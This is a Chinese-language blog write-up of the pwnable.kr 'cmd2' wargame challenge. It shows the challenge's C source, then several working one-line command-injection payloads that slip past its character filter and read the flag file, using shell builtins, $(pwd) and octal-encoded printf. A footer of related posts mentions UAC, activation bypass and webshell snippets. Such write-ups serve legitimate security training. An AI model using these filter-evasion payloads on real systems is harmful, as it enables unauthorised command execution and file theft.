【pwnable.kr】 cmd2 - bypass with shell builtin commands & etc & system实现

最新推荐文章于 2021-04-01 21:32:59 发布
最新推荐文章于 2021-04-01 21:32:59 发布
阅读量295 收藏
点赞数
分类专栏: pwnable.kr pwnable.kr 文章标签: pwnable.kr cmd2 system
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/think_ycx/article/details/82991032
版权 
cmd2 - 9 pt

Daddy bought me a system command shell.
but he put some filters to prevent me from playing with it without his permission...
but I wanna play anytime I want!

ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)

下载程序,scp -P 2222 -p cmd2@pwnable.kr:/home/cmd2/* ./ password:mommy now I get what PATH environment is for :)

源码如下:

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
	int r=0;
	r += strstr(cmd, "=")!=0;
	r += strstr(cmd, "PATH")!=0;
	r += strstr(cmd, "export")!=0;
	r += strstr(cmd, "/")!=0;
	r += strstr(cmd, "`")!=0;
	r += strstr(cmd, "flag")!=0;
	return r;
}

extern char** environ;
void delete_env(){
	char** p;
	for(p=environ; *p; p++)	memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
	delete_env();
	putenv("PATH=/no_command_execution_until_you_become_a_hacker");
	if(filter(argv[1])) return 0;
	printf("%s\n", argv[1]);
	system( argv[1] );
	return 0;
}

cmd2是cmd1的加强版,清空了环境变量。不允许出现 = PATH export / ` flag。

由于限制了/,导致cmd1中的bypass方案几乎都失效了,因为没有/的情况下,当前目录没有写权限,不能调用别的命令了。system本质是调用execve /bin/sh 来执行命令的(见文末system源码调试)。所以要想方法借助sh的特性来出现/。

最终我发现了在sh有的命令是调用/bin /usr/bin目录下的文件来执行的,还存在一些命令是sh内置的命令。如sh中的echo和/bin/echo是两种文件,而且在不同的shell中实现的也不愿意。以zsh为例。

➜  ~ which echo
echo: shell built-in command
➜  ~ which /bin/echo
/bin/echo

这里介绍了csh和sh中的shell builtin command https://www.gsp.com/cgi-bin/man.cgi?section=1&topic=builtin

综上,借助sh的shell builtin command来读flag。

flag

# sh在没有环境变量时,也可以执行command命令
cmd2@ubuntu:~$ ./cmd2 "command -p cat f\lag"
command -p cat f\lag
FuN_w1th_5h3ll_v4riabl3s_haha

# read 读取环境并执行
cmd2@ubuntu:~$ ./cmd2 "read a;\$a"
read a;$a
/bin/cat flag
FuN_w1th_5h3ll_v4riabl3s_haha

# set -s
cmd2@ubuntu:~$ /home/cmd2/cmd2 'set -s'
set -s
/bin/cat flag
FuN_w1th_5h3ll_v4riabl3s_haha


# 根目录运行pwd得到 / ,用来替代/  ,cmd1中的姿势都可以用了XD
cmd2@ubuntu:/$ /home/cmd2/cmd2 '$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)fla\g'
$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)fla\g
FuN_w1th_5h3ll_v4riabl3s_haha

看网上某些wp,printf echo pwd这些命令不是builtin command(例如,printf在sh中是在/usr/bin/printf目录下的),但是也可以运行,awesome!

不是builtin command,没有path的情况下,为什么可以索引到呢?以后遇到了再研究吧。

# printf  八进制数构造/bin/cat flag 
cmd2@ubuntu:~$ ./cmd2 '$(printf "\57\142\151\156\57\143\141\164\40\146\154\141\147")'
$(printf "\57\142\151\156\57\143\141\164\40\146\154\141\147")
FuN_w1th_5h3ll_v4riabl3s_haha

# sh中 echo '\57' 就是 /   '$()'会传递给程序, "$()"会直接解析再传递
cmd2@ubuntu:~$ sh
$ echo '\57'
/
cmd2@ubuntu:~$ ./cmd2 '$(echo "\57bin\57cat fla*")'
$(echo "\57bin\57cat fla*")
FuN_w1th_5h3ll_v4riabl3s_haha

 

参考

  1. command https://medium.com/@clong/pwnable-kr-cmd1-cmd2-writeups-e6980fa8daca
  2. set -s https://gist.github.com/dual5651/910a89eabcb471ab3a314ed52a82a5c7
  3. set的更多参数用法 http://www.ruanyifeng.com/blog/2017/11/bash-set.html
  4. read http://www.ktstartblog.top/index.php/archives/132/
  5. pwd https://www.cnblogs.com/p4nda/p/7147552.html
  6. printf https://medium.com/@c0ngwang/pwnable-kr-writeup-cmd2-a40142d43498
  7. echo http://xhyumiracle.com/pwnablr-kr-cmd2/

 

 

补充:system调用sh执行命令源码

下载glibc后,开始调试system源码。

# 编译
gcc system.c -g -o system
# 调试
gdb system
# 加载源码
gdb> directory /root/Pwn/glibc/glibc-2.23/sysdeps/posix/

system调用链:__libc_system->do_system->__execve (SHELL_PATH, (char *const *) new_argv, __environ) 。SHELL_PATH是/bin/sh。

do_system 部分源码:

// ... 处理一些信号 
if (pid == (pid_t) 0)
    {
      /* Child side.  */
      const char *new_argv[4];
      new_argv[0] = SHELL_NAME;
      new_argv[1] = "-c";
      new_argv[2] = line;
      new_argv[3] = NULL;

      /* Restore the signals.  */
      (void) __sigaction (SIGINT, &intr, (struct sigaction *) NULL);
      (void) __sigaction (SIGQUIT, &quit, (struct sigaction *) NULL);
      (void) __sigprocmask (SIG_SETMASK, &omask, (sigset_t *) NULL);
      INIT_LOCK ();

      /* Exec the shell.  */
      (void) __execve (SHELL_PATH, (char *const *) new_argv, __environ);
      _exit (127);
    }

详细参考:关于glibc的system函数调用实现https://blog.csdn.net/u010039418/article/details/77017689

think_ycx
关注
专栏目录
区分Linux内建命令和外部命令——pwd
liumei90
09-01 1万+
Linux命令有内部命令(内建命令)和外部命令之分,内部命令和外部命令功能基本相同,但也有些细微差别。 内部命令实际上是shell程序的一部分,其中包含的是一些比较简单的linux系统命令,这些命令由shell程序识别并在shell程序内部完成运行,通常在linux系统加载运行时shell就被加载并驻留在系统内存中。内部命令是写在bashy源码里面的,其执行速度比外部命令快,因为解析内部命令sh
Shell 的内置(builtin)命令
我的博客
12-29 1500
Shell 的内置(builtin)命令
Shell内建命令与外部命令
Code changes the world!
09-04 201
外部命令 外部命令也称文件系统命令,他们不属于bash shell,它们常位于/bin、/sbin、/usr/bin、/usr/sbin,当外部命令执行时会新建一个子进程 如下显示cd命令是内建命令 ➜ ~ which cd cd: shell built-in command ➜ ~ type cd cd is a shell builtin 如下显示ps为外部命令 ➜ ~ whic...
Shell编程之常用内置命令
RtxTitanV的博客
04-01 1390
本文主要对常用的Shell内置命令(Shell Builtin Commands)进行简单总结,另外本文所使用的Linux环境为CentOS Linux release 8.2.2004,所使用的Shell为bash 5.1.0(1)-release。
cmd php 不是内部命令_命令执行底层原理探究-PHP(一)
weixin_39606244的博客
12-26 324
前言针对不同平台/语言下的命令执行是不相同的,存在很大的差异性。因此,这里对不同平台/语言下的命令执行函数进行深入的探究分析。文章开头会对不同平台(Linux、Windows)下:终端的指令执行、语言(PHP、Java、Python)的命令执行进行介绍分析。后面,主要以PHP语言为对象,针对不同平台,对命令执行函数进行底层深入分析,这个过程包括:PHP内核源码的编译、运行、调试、审计等,其它语言分...
samsung-activation-bypass-v2跳过-45.zip
最新发布
09-05
2. **module.prop** 和 **system.prop** - 这两个文件是Android系统中的配置文件,通常用于设置系统的属性和模块参数。在激活绕过过程中,它们可能被用来修改与设备认证或激活相关的系统设置。 3. **sepolicy.rule*...
VB-UAC-BYPASS.rar_VB 提权_bypass uac_vb uac_提权_模拟CMD
09-22
"模拟弹出一个CMD欺骗"是实现这一目标的一种策略,通过伪装成系统的正常操作,诱使用户授权,从而在不知情的情况下提升权限。 标签中的关键词进一步强调了这个主题,"vb_提权"表示这是VB的权限提升技术,"bypass_...
hbase hbck2修复工具hbase-operator-tools-1.0.0.1.0.0.0-618-bin.tar.gz
10-16
hbase hbck2修复工具hbase-operator-tools-1.0.0.1.0.0.0-618-bin.tar.gz,hbase1版本的hbck已经不支持修复命令,hbase2.1版本需要用这个新版的工具
Universal.Bypass.for.Chromium-based.browsers_opera_UniversalBypa
09-30
2. `content_script.js`:内容脚本,它会在网页的上下文中运行,可以直接操作网页DOM,实现与网页交互的功能,比如在这个案例中可能是检测和处理缩短的URL。 3. `manifest.json`:这是每个Chrome和Opera扩展必备的...
WAF攻防实战笔记v1.0--Bypass.pdf
03-30
2. **关键字等价替换**:使用函数等价替换或不同函数调用相同功能的方法,例如使用“Hex()”和“bin()”来替换“ascii()”,或者使用“Sleep()”和“benchmark()”来替换“sleep()”。 ### 数据库特性 针对不同...
pwnable.kr---cmd2
leeham的博客
11-08 474
pwnable.krcmd2解题思路同cmd1的writeup一样,一步一步解析问题:delete_env();此行清除了所有的环境变量;因此想在执行cmd2之前设置环境变量并利用变量绕过filter,那么这一步就是一个阻碍。另外要注意的是,extern char ** environ中environ是一个系统已经定义的变量,在此声明后即可使用,它的作用是指向环境变量。if(filter(argv
命令注入的一点学习记录
豆傻小饼干随记
05-12 1960
# Command_Injection ## 一、`Command_Injection` 简介 命令注入是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令。当应用程序将用户提供的不安全数据(表单e,cookie,HTTP标头等)传递到系统外壳时,可能会发生命令注入攻击。在这种攻击中,攻击者提供的操作系统命令通常是在易受攻击的应用程序的特权下执行的。由于没有足够的输入验证,因此可能发生命令注入攻击。 此攻击与代码注入不同,代码注入使攻击者可以添加自己的代码,然后由应用程序执行。在“命
huaiweictf 部分 web
qq_42158602的博客
12-22 476
web WEBSHELL_1 免杀shell <%@ page contentType="text/html;charset=UTF-8" language="java" %> <% if(request.getParameter("cmd")!=null){ Class rt = Class.forName(new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117,
什么是bash shell的内建(build in)命令
河西无名式
06-14 3913
1.什么是build in命令:         shell内建命令是指bash(或其它版本)工具集中的命令。一般都会有一个与之同名的系统命令,比如bash中的echo命令与/bin/echo是两个不同的命令,尽管他们行为大体相仿。当在bash中键入一个命令时系统会先看他是否是一个内建命令,如果不是才会查看是否是系统命令或第三方工具。所以在bash中键入echo命令实际上执行bash工具
【Bash百宝箱】shell内建命令之echo、printf
Making Life Better. Making Others Better.
09-23 4105
1、echo在shell中,内建(builtin)命令echo,格式如下:echo [-neE] [arg ...]echo命令用于输出各参数arg,参数间以空格分隔,结尾是个换行符。选项“-n”禁止输出结尾的换行符。对于一些反斜线“\”转义的特殊字符,在echo命令中默认不进行转义,选项“-e”启用转义,“-E”禁止转义。下面是反斜线“\”转义的特殊字符。 \a
LINUX信号处理(sigaction信号捕获函数:struct sigaction)
热门推荐
qq_20853741的博客
02-02 1万+
一、函数结构 #include <signal.h> int sigaction(int signum, const struct sigaction *act,struct sigaction *oldact); 参数: 参数1:要捕获的信号 参数2:接收到信号之后对信号进行处理的结构体 参数3:接收到信号之后,保存原来对此信号处理的各种方式与信号(可用来做备份)。如果不需要备份,此处可以填NULL 返回值: 成功时:返回0 出错时:返回-1,并将errno设置
【Bash百宝箱】shell内建命令之builtincommand、caller
Making Life Better. Making Others Better.
09-22 5872
1、builtinshell中,内建(builtin)命令builtin,格式如下:builtin shell-builtin [arguments]builtin命令用以执行shell的内建命令,既然是内建命令,为什么还要以这种方式执行呢?因为shell命令执行时首先从函数开始,如果自定义了一个与内建命令同名的函数,那么就执行这个函数而非真正的内建命令。下面以shell内建命令umask为例说明
Shell built-in commands
weixin_34117522的博客
09-23 508
1.DESCRIPTION: Shell builtin commands are commands that can be executed within the run-ning shell's process. Note that, in the case of csh(1) builtin commands,the command is executed...
powershell.exe -exec bypass -Command "& {Import-Module C:\Users\win7\Desktop\tool\PowerView.ps1; Invoke-UserEvenHunter}" 解释一下
07-28
- `-exec bypass`:这是PowerShell的执行策略参数,用于绕过执行策略限制,允许执行未签名的脚本。 - `-Command`:这是PowerShell的参数,用于指定要执行的命令。 - `"& {Import-Module C:\Users\win7\Desktop\tool\...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值